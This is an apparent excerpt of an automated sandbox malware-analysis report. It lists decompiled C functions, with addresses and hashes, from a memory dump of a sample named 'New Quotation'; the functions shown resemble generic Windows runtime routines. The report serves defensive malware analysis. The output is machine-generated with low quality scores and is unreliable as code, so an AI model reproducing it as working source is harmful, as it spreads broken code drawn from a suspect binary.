                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0754c3be93d9ba11ea9134f78665c87217d52e306ea01fe2339886d40d526197
                                                                                                                                                                                          • Instruction ID: b9dd9e7722c664ff64943faf864e2251ab63005b0e1db6c8301c4eea014d98c6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0754c3be93d9ba11ea9134f78665c87217d52e306ea01fe2339886d40d526197
                                                                                                                                                                                          • Instruction Fuzzy Hash: C421B072600A04FFC711CF99DC84EABBBB9EF85AA0F11445AF605972A0D230EE00CB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8799D6 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 39%
                                                                                                                                                                                          			E1D8799D6(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _t37;
				void* _t45;
				intOrPtr _t48;
				char _t53;
				signed int _t58;
				intOrPtr _t62;

				_t45 = __ecx;
				_t48 =  *[fs:0x30];
				_t58 = 0;
				_v20 = __edx;
				_t53 = 1;
				_v24 = _t48;
				if(__edx != 0) {
					do {
						_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t48 + 0x90)) + _t58 * 4));
						if( *((intOrPtr*)(_t62 + 8)) != 0xddeeddee) {
							if(( *(_t62 + 0x40) & 0x00000001) == 0) {
								if( *((char*)(_t62 + 0xea)) != 2) {
									_t37 = 0;
								} else {
									_t37 =  *((intOrPtr*)(_t62 + 0xe4));
								}
								if(_t37 != 0) {
									if(_t45 != 0) {
										 *_t37 = _t53;
									}
									E1D7E24D0(_t37);
									_t53 = 1;
								}
								if(_t45 != 0) {
									_t48 =  *((intOrPtr*)(_t62 + 0xc8));
									 *((short*)(_t62 + 0xe8)) = 0;
									 *(_t48 + 0x10) =  *(_t48 + 0x10) & 0x00000000;
									 *((intOrPtr*)(_t48 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t48 + 4)) = 0xfffffffe;
									 *((intOrPtr*)(_t48 + 8)) = _t53;
								}
								_push( *((intOrPtr*)(_t62 + 0xc8)));
								E1D7DE740(_t48);
								goto L15;
							}
						} else {
							if(( *(_t62 + 0xc) & 0x00000001) == 0) {
								E1D899C1D(_t62, _t45);
								L15:
								_t48 = _v20;
								_t53 = 1;
							}
						}
						_t58 = _t58 + 1;
					} while (_t58 < _v20);
				}
				if(_t45 != 0) {
					 *0x1d8c4810 =  *0x1d8c4810 & 0x00000000;
					 *0x1d8c6dd8 =  *0x1d8c6dd8 | 0xffffffff;
					 *0x1d8c480c =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					 *0x1d8c4804 = 0xfffffffe;
					 *0x1d8c4808 = _t53;
					 *0x1d8c6dd4 = _t53;
				}
				_v8 = 0x1d8c6dc8;
				_v16 = _t53;
				_v12 = 0xff;
				L1D8A0221();
				_push(0x1d8c4800);
				return E1D7DE740( &_v16);
			}














                                                                                                                                                                                          0x1d8799e4
                                                                                                                                                                                          0x1d8799e6
                                                                                                                                                                                          0x1d8799f1
                                                                                                                                                                                          0x1d8799f3
                                                                                                                                                                                          0x1d8799f7
                                                                                                                                                                                          0x1d8799f8
                                                                                                                                                                                          0x1d8799fe
                                                                                                                                                                                          0x1d879a04
                                                                                                                                                                                          0x1d879a0a
                                                                                                                                                                                          0x1d879a14
                                                                                                                                                                                          0x1d879a2b
                                                                                                                                                                                          0x1d879a34
                                                                                                                                                                                          0x1d879a3e
                                                                                                                                                                                          0x1d879a36
                                                                                                                                                                                          0x1d879a36
                                                                                                                                                                                          0x1d879a36
                                                                                                                                                                                          0x1d879a42
                                                                                                                                                                                          0x1d879a46
                                                                                                                                                                                          0x1d879a48
                                                                                                                                                                                          0x1d879a48
                                                                                                                                                                                          0x1d879a4b
                                                                                                                                                                                          0x1d879a52
                                                                                                                                                                                          0x1d879a52
                                                                                                                                                                                          0x1d879a55
                                                                                                                                                                                          0x1d879a57
                                                                                                                                                                                          0x1d879a5f
                                                                                                                                                                                          0x1d879a6f
                                                                                                                                                                                          0x1d879a73
                                                                                                                                                                                          0x1d879a76
                                                                                                                                                                                          0x1d879a7d
                                                                                                                                                                                          0x1d879a7d
                                                                                                                                                                                          0x1d879a80
                                                                                                                                                                                          0x1d879a86
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d879a86
                                                                                                                                                                                          0x1d879a16
                                                                                                                                                                                          0x1d879a1a
                                                                                                                                                                                          0x1d879a20
                                                                                                                                                                                          0x1d879a8b
                                                                                                                                                                                          0x1d879a8b
                                                                                                                                                                                          0x1d879a91
                                                                                                                                                                                          0x1d879a91
                                                                                                                                                                                          0x1d879a1a
                                                                                                                                                                                          0x1d879a92
                                                                                                                                                                                          0x1d879a93
                                                                                                                                                                                          0x1d879a04
                                                                                                                                                                                          0x1d879a9f
                                                                                                                                                                                          0x1d879aaa
                                                                                                                                                                                          0x1d879ab1
                                                                                                                                                                                          0x1d879ab8
                                                                                                                                                                                          0x1d879abd
                                                                                                                                                                                          0x1d879ac7
                                                                                                                                                                                          0x1d879acd
                                                                                                                                                                                          0x1d879acd
                                                                                                                                                                                          0x1d879ad7
                                                                                                                                                                                          0x1d879adf
                                                                                                                                                                                          0x1d879ae3
                                                                                                                                                                                          0x1d879ae8
                                                                                                                                                                                          0x1d879aed
                                                                                                                                                                                          0x1d879afd

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a725d795c9499a5500e664d5560f422e399455f0538b62d8e7623ad34c49f78d
                                                                                                                                                                                          • Instruction ID: fe4fbe697d6e2ca1f8aac5f3c6b2e19371323bf6267301edcf33173175e401fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: a725d795c9499a5500e664d5560f422e399455f0538b62d8e7623ad34c49f78d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8231B070A047818FC325DF2ED584766B7E5FB89324F15CA2DE4A987291DB30A846CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D3CF0 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E1D7D3CF0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t36;
				intOrPtr _t45;
				signed int* _t47;
				void* _t52;
				signed int _t55;
				intOrPtr _t57;
				signed int _t60;
				void* _t61;

				_t58 = __esi;
				_push(0x18);
				_push(0x1d8abc60);
				E1D827BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t61 - 0x1c)) = 0xc0000001;
				_t45 =  *((intOrPtr*)(_t61 + 0x14));
				if(_t45 != 0) {
					_t55 =  *(_t45 + 0x1c);
				} else {
					_t55 = 0;
				}
				_t47 =  *(_t61 + 8);
				if(_t47 == 0 ||  *((intOrPtr*)(_t61 + 0xc)) == 0 || (_t55 & 0xfffffffc) != 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					E1D8A4A6D(_t45, _t47, _t52, _t55, _t58);
					_t33 = 0xc000000d;
				} else {
					 *_t47 =  *_t47 & 0x00000000;
					_t36 =  *0x1d8c6644; // 0x0
					_t60 = E1D7E5D90(_t47,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t36 + 0x00200000 | 0x00000008, 0x90);
					 *(_t61 - 0x20) = _t60;
					 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
					 *((intOrPtr*)(_t61 - 0x24)) = 1;
					_t71 = _t60;
					if(_t60 == 0) {
						_t57 = 0xc0000017;
						 *((intOrPtr*)(_t61 - 0x1c)) = 0xc0000017;
					} else {
						_t60 =  *(_t61 - 0x20);
						 *((intOrPtr*)(_t60 + 0x6c)) =  *((intOrPtr*)(_t61 + 4));
						_push(0x1d7a1080);
						_push(0x1d7a114c);
						_push(_t55);
						_push(_t45);
						_t57 = E1D7D496B(_t45, _t60, _t55, _t60, _t71);
						 *((intOrPtr*)(_t61 - 0x1c)) = _t57;
						if(_t57 >= 0) {
							_t40 =  *((intOrPtr*)(_t61 + 0xc));
							 *((intOrPtr*)(_t60 + 0x30)) =  *((intOrPtr*)(_t61 + 0xc));
							_t57 = 0;
							 *((intOrPtr*)(_t61 - 0x1c)) = 0;
							if(_t45 != 0) {
								_t40 =  *((intOrPtr*)(_t45 + 0x18));
								 *((intOrPtr*)(_t60 + 0x10)) =  *((intOrPtr*)(_t45 + 0x18));
							}
							_t74 =  *((intOrPtr*)(_t60 + 8)) - _t57;
							if( *((intOrPtr*)(_t60 + 8)) != _t57) {
								_t40 = E1D8073B3(_t45, _t60, _t57, _t60, _t74);
							}
						}
					}
					 *(_t61 - 4) = 0xfffffffe;
					 *((intOrPtr*)(_t61 - 0x24)) = 0;
					E1D7D3E01(_t40, _t57, _t60);
					if(_t57 >= 0) {
						 *( *(_t61 + 8)) = _t60;
					}
					_t33 = _t57;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0x10));
				return _t33;
			}












                                                                                                                                                                                          0x1d7d3cf0
                                                                                                                                                                                          0x1d7d3cf0
                                                                                                                                                                                          0x1d7d3cf2
                                                                                                                                                                                          0x1d7d3cf7
                                                                                                                                                                                          0x1d7d3cfc
                                                                                                                                                                                          0x1d7d3d03
                                                                                                                                                                                          0x1d7d3d08
                                                                                                                                                                                          0x1d7d3df9
                                                                                                                                                                                          0x1d7d3d0e
                                                                                                                                                                                          0x1d7d3d0e
                                                                                                                                                                                          0x1d7d3d0e
                                                                                                                                                                                          0x1d7d3d10
                                                                                                                                                                                          0x1d7d3d15
                                                                                                                                                                                          0x1d82ffcc
                                                                                                                                                                                          0x1d82ffd1
                                                                                                                                                                                          0x1d7d3d44
                                                                                                                                                                                          0x1d7d3d44
                                                                                                                                                                                          0x1d7d3d47
                                                                                                                                                                                          0x1d7d3d68
                                                                                                                                                                                          0x1d7d3d6a
                                                                                                                                                                                          0x1d7d3d6d
                                                                                                                                                                                          0x1d7d3d71
                                                                                                                                                                                          0x1d7d3d78
                                                                                                                                                                                          0x1d7d3d7a
                                                                                                                                                                                          0x1d82ff88
                                                                                                                                                                                          0x1d82ff8d
                                                                                                                                                                                          0x1d7d3d80
                                                                                                                                                                                          0x1d7d3d83
                                                                                                                                                                                          0x1d7d3d86
                                                                                                                                                                                          0x1d7d3d89
                                                                                                                                                                                          0x1d7d3d8e
                                                                                                                                                                                          0x1d7d3d93
                                                                                                                                                                                          0x1d7d3d94
                                                                                                                                                                                          0x1d7d3d9f
                                                                                                                                                                                          0x1d7d3da1
                                                                                                                                                                                          0x1d7d3da6
                                                                                                                                                                                          0x1d7d3da8
                                                                                                                                                                                          0x1d7d3dab
                                                                                                                                                                                          0x1d7d3dae
                                                                                                                                                                                          0x1d7d3db0
                                                                                                                                                                                          0x1d7d3db5
                                                                                                                                                                                          0x1d7d3db7
                                                                                                                                                                                          0x1d7d3dba
                                                                                                                                                                                          0x1d7d3dba
                                                                                                                                                                                          0x1d7d3dbd
                                                                                                                                                                                          0x1d7d3dc0
                                                                                                                                                                                          0x1d7d3dc4
                                                                                                                                                                                          0x1d7d3dc4
                                                                                                                                                                                          0x1d7d3dc0
                                                                                                                                                                                          0x1d7d3da6
                                                                                                                                                                                          0x1d7d3dc9
                                                                                                                                                                                          0x1d7d3dd0
                                                                                                                                                                                          0x1d7d3dd7
                                                                                                                                                                                          0x1d7d3dde
                                                                                                                                                                                          0x1d7d3de3
                                                                                                                                                                                          0x1d7d3de3
                                                                                                                                                                                          0x1d7d3de5
                                                                                                                                                                                          0x1d7d3de5
                                                                                                                                                                                          0x1d7d3dea
                                                                                                                                                                                          0x1d7d3df6

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 574639f6d378aafe611208590d6480bea4148f048373fcb2dcfbb83a6c605aad
                                                                                                                                                                                          • Instruction ID: ac7f0276628deacd1bb8c3033cc01a6b366fb23d40b9a886b7dcc7b1984d6e85
                                                                                                                                                                                          • Opcode Fuzzy Hash: 574639f6d378aafe611208590d6480bea4148f048373fcb2dcfbb83a6c605aad
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4431CF76A00B54DFDB01CF59C880BAA77B0FF88B24F11451AE814AB390C775A901CF92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D8C79 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                          			E1D7D8C79(signed char __ecx, intOrPtr* __edx) {
				intOrPtr* _v8;
				void* _t18;
				char* _t21;
				signed char* _t23;
				signed int _t24;
				signed int _t25;
				intOrPtr _t26;
				signed char _t30;
				intOrPtr* _t33;
				void* _t36;
				void* _t39;
				char* _t42;
				signed char* _t46;

				_push(__ecx);
				_v8 = __edx;
				_t30 = __ecx;
				_t18 = E1D7E3C40();
				_t42 = 0x7ffe0384;
				if(_t18 != 0) {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t21 = 0x7ffe0384;
				}
				_t46 = 0x7ffe0385;
				if( *_t21 != 0) {
					if(E1D7E3C40() == 0) {
						_t23 = 0x7ffe0385;
					} else {
						_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t23 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t26 = E1D7E3C40();
					if(_t26 != 0) {
						_t26 =  *[fs:0x30];
						_t42 =  *((intOrPtr*)(_t26 + 0x50)) + 0x22a;
					}
					if( *_t42 != 0) {
						_t26 =  *[fs:0x30];
						if(( *(_t26 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t26 = E1D7E3C40();
						if(_t26 != 0) {
							_t26 =  *[fs:0x30];
							_t46 =  *((intOrPtr*)(_t26 + 0x50)) + 0x22b;
						}
						if(( *_t46 & 0x00000020) == 0) {
							goto L5;
						}
						L17:
						_t47 = _v8;
						_t33 = _v8;
						_t39 = _t33 + 2;
						do {
							_t24 =  *_t33;
							_t33 = _t33 + 2;
						} while (_t24 != 0);
						_t25 = _t24 | 0xffffffff;
						_t36 = (_t33 - _t39 >> 1) + (_t33 - _t39 >> 1);
						if((_t30 & 0x00000002) == 0) {
							if((_t30 & 0x00000001) == 0) {
								L24:
								_t26 = E1D850AFF(_t30, 0, _t25, _t36, _t47);
								goto L5;
							}
							_push(6);
							L23:
							_pop(_t25);
							goto L24;
						}
						_push(5);
						goto L23;
					} else {
						L5:
						return _t26;
					}
				}
			}
















                                                                                                                                                                                          0x1d7d8c7e
                                                                                                                                                                                          0x1d7d8c82
                                                                                                                                                                                          0x1d7d8c85
                                                                                                                                                                                          0x1d7d8c87
                                                                                                                                                                                          0x1d7d8c8c
                                                                                                                                                                                          0x1d7d8c93
                                                                                                                                                                                          0x1d83222d
                                                                                                                                                                                          0x1d7d8c99
                                                                                                                                                                                          0x1d7d8c99
                                                                                                                                                                                          0x1d7d8c99
                                                                                                                                                                                          0x1d7d8c9e
                                                                                                                                                                                          0x1d7d8ca3
                                                                                                                                                                                          0x1d83223e
                                                                                                                                                                                          0x1d832250
                                                                                                                                                                                          0x1d832240
                                                                                                                                                                                          0x1d832249
                                                                                                                                                                                          0x1d832249
                                                                                                                                                                                          0x1d832255
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832257
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832257
                                                                                                                                                                                          0x1d7d8ca9
                                                                                                                                                                                          0x1d7d8ca9
                                                                                                                                                                                          0x1d7d8ca9
                                                                                                                                                                                          0x1d7d8cb0
                                                                                                                                                                                          0x1d83225c
                                                                                                                                                                                          0x1d832265
                                                                                                                                                                                          0x1d832265
                                                                                                                                                                                          0x1d7d8cb9
                                                                                                                                                                                          0x1d832270
                                                                                                                                                                                          0x1d83227d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832283
                                                                                                                                                                                          0x1d83228a
                                                                                                                                                                                          0x1d83228c
                                                                                                                                                                                          0x1d832295
                                                                                                                                                                                          0x1d832295
                                                                                                                                                                                          0x1d83229e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8322a4
                                                                                                                                                                                          0x1d8322a4
                                                                                                                                                                                          0x1d8322a7
                                                                                                                                                                                          0x1d8322a9
                                                                                                                                                                                          0x1d8322ac
                                                                                                                                                                                          0x1d8322ac
                                                                                                                                                                                          0x1d8322af
                                                                                                                                                                                          0x1d8322b2
                                                                                                                                                                                          0x1d8322b9
                                                                                                                                                                                          0x1d8322be
                                                                                                                                                                                          0x1d8322c3
                                                                                                                                                                                          0x1d8322cc
                                                                                                                                                                                          0x1d8322d1
                                                                                                                                                                                          0x1d8322d8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8322d8
                                                                                                                                                                                          0x1d8322ce
                                                                                                                                                                                          0x1d8322d0
                                                                                                                                                                                          0x1d8322d0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8322d0
                                                                                                                                                                                          0x1d8322c5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d8cbf
                                                                                                                                                                                          0x1d7d8cbf
                                                                                                                                                                                          0x1d7d8cc3
                                                                                                                                                                                          0x1d7d8cc3
                                                                                                                                                                                          0x1d7d8cb9

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 6500f08a74af63fbfd20657ae4f9c8e6d1ec2716c2b9bdce45284f75af2ea64d
                                                                                                                                                                                          • Instruction ID: aacf1a024010f9681856beb6172ceba4c8deb84a3969cc0a018b24bbf027581e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6500f08a74af63fbfd20657ae4f9c8e6d1ec2716c2b9bdce45284f75af2ea64d
                                                                                                                                                                                          • Instruction Fuzzy Hash: B0214835601A81EBE3068728CD84B25B79DEF40BA1F0A40E6ED0D8B7E1E768EC40C193
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D84FE1F Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                          			E1D84FE1F(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E1D7E3C40();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1d8c5d78; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = E1D7E5D90(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E1D8188C0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E1D7E3C40() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E1D812F90();
						_t23 = E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                                                                                                                                          0x1d84fe1f
                                                                                                                                                                                          0x1d84fe24
                                                                                                                                                                                          0x1d84fe25
                                                                                                                                                                                          0x1d84fe28
                                                                                                                                                                                          0x1d84fe2a
                                                                                                                                                                                          0x1d84fe2e
                                                                                                                                                                                          0x1d84fe31
                                                                                                                                                                                          0x1d84fe36
                                                                                                                                                                                          0x1d84fe3d
                                                                                                                                                                                          0x1d84fe4f
                                                                                                                                                                                          0x1d84fe3f
                                                                                                                                                                                          0x1d84fe48
                                                                                                                                                                                          0x1d84fe48
                                                                                                                                                                                          0x1d84fe54
                                                                                                                                                                                          0x1d84fe5d
                                                                                                                                                                                          0x1d84fe62
                                                                                                                                                                                          0x1d84fe75
                                                                                                                                                                                          0x1d84fe7a
                                                                                                                                                                                          0x1d84fe7e
                                                                                                                                                                                          0x1d84fe88
                                                                                                                                                                                          0x1d84fe8e
                                                                                                                                                                                          0x1d84fe94
                                                                                                                                                                                          0x1d84fe9b
                                                                                                                                                                                          0x1d84fea5
                                                                                                                                                                                          0x1d84fea9
                                                                                                                                                                                          0x1d84febb
                                                                                                                                                                                          0x1d84fec7
                                                                                                                                                                                          0x1d84fed2
                                                                                                                                                                                          0x1d84fed2
                                                                                                                                                                                          0x1d84fed8
                                                                                                                                                                                          0x1d84fedc
                                                                                                                                                                                          0x1d84fee0
                                                                                                                                                                                          0x1d84fee5
                                                                                                                                                                                          0x1d84fee6
                                                                                                                                                                                          0x1d84fef7
                                                                                                                                                                                          0x1d84fef7
                                                                                                                                                                                          0x1d84fe7e
                                                                                                                                                                                          0x1d84ff00

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: faa146f0d7ecd046d5aa9b1593677b7fc566ee368a69132a3e74c68974711108
                                                                                                                                                                                          • Instruction ID: 4bf52613bceb4fb6cc0783df86de8551f9522baf24eee338e2940f3563659682
                                                                                                                                                                                          • Opcode Fuzzy Hash: faa146f0d7ecd046d5aa9b1593677b7fc566ee368a69132a3e74c68974711108
                                                                                                                                                                                          • Instruction Fuzzy Hash: F621AD76600644AFD715CB58D884F6AB7B8FF48740F2140A9F904DB6A1D734ED40CB65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D811ED8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E1D811ED8(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				void* _t55;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				signed int _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				signed int _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					__eflags =  *((intOrPtr*)(_t72 + 0xc)) - _t57;
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L11:
						_t72 =  *_t72;
						continue;
					}
					_t18 = _t72 + 0x10; // 0x10
					_t55 = E1D828050(_t18, _t65, _t57);
					__eflags = _t55 - _t57;
					if(_t55 != _t57) {
						_t65 = _v8;
						goto L11;
					}
					return 0xb7;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E1D80457E(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = E1D7E5D90(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E1D8188C0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E1D7DDE20(_t62, __eflags, _t71, 1, 6,  &_v36);
					__eflags = _t63;
					if(_t63 == 0) {
						L24:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					__eflags = _t45 - _t58;
					if(_t45 < _t58) {
						goto L24;
					}
					_t69 = _t45 / _t58;
					__eflags = _t69;
					if(_t69 == 0) {
						L23:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						__eflags =  *((intOrPtr*)(_t63 + 0xc)) - 2;
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L22;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						__eflags =  *_t49 - 0x53445352;
						if( *_t49 != 0x53445352) {
							goto L22;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						__eflags = 0;
						return 0;
						L22:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
						__eflags = _t74 - _t69;
					} while (_t74 < _t69);
					goto L23;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}



























                                                                                                                                                                                          0x1d811ed8
                                                                                                                                                                                          0x1d811ee1
                                                                                                                                                                                          0x1d811ee4
                                                                                                                                                                                          0x1d811ee8
                                                                                                                                                                                          0x1d811eeb
                                                                                                                                                                                          0x1d811eeb
                                                                                                                                                                                          0x1d811ef1
